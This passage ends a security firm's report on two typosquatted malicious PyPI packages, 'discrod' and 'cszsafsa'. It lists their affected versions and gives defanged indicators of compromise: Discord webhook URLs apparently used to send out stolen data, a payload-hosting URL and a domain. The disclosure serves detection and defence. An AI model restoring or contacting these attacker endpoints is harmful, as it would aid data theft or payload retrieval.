After describing all these features implemented in “discrod” and “cszsafsa”, it is also worth mentioning that the current versions of both packages are still somewhat of a work in progress. Both packages contain mistakes that might prevent them from working properly, such as variables used before their definition, or modules imports that are not included in the package’s requirements.

Conclusion

Supply chain attacks are on the rise. Attackers joining this wave continue to use the techniques that worked in the past such as typosquatting, this is how we discovered these two malicious packages, but they are also looking to expand their arsenal.

An infected open source package with self-spreading capabilities is one of these attempts. Worm functionalities aren’t new by themselves but incorporating then in a supply chain attack to try to infect other developers is a novel concept and we are likely to see more of these in the near future

We have alerted PyPi and these packages were removed from the package manager.

Malicious Packages & Versions

discrod
- 6.9.2
- 6.9.5
- 7.1.0
cszsafsa
- 0.0.2
- 0.0.3
- 0.0.4
- 0.0.5
- 0.0.9

IOC’s

hxxps://discord[.]com/api/webhooks/845637931749736498/ewOnnjXCvtX1bzTDPhFEe1fFZ4MFh7t-OydnQ3ob2MxQ_sMq2ZXXNIwA36OWBFjP3vbV
hxxps://discord[.]com/api/webhooks/886147895005442058/WKFVu_NhyE3MicZukAaLhaNufV0i4ztebB5K8y1egu4EyDqViyreY1nM6_3jIi2Sf_cw
hxxps://discord[.]com/api/webhooks/836482102253191199/OrQcEYYeR4C_QNPKTx2ZGaWfNKZlSD5lxnRkmgf4SE0ofKtXJkiVJfaIE9Jiy6vThSnG
hxxps://mehmetcanyildiz[.]com/wp-content/uploads/2020/11/black.png
un5t48l3[.]com

Final Words

To help combat the growing problem of similar attacks, Checkmarx will combine its Application Security Platform with Dustico’s behavioral analysis technology to give customers a unified view into the risk, reputation, and behavior of open source packages, resulting in a more comprehensive approach to preventing future supply chain attacks.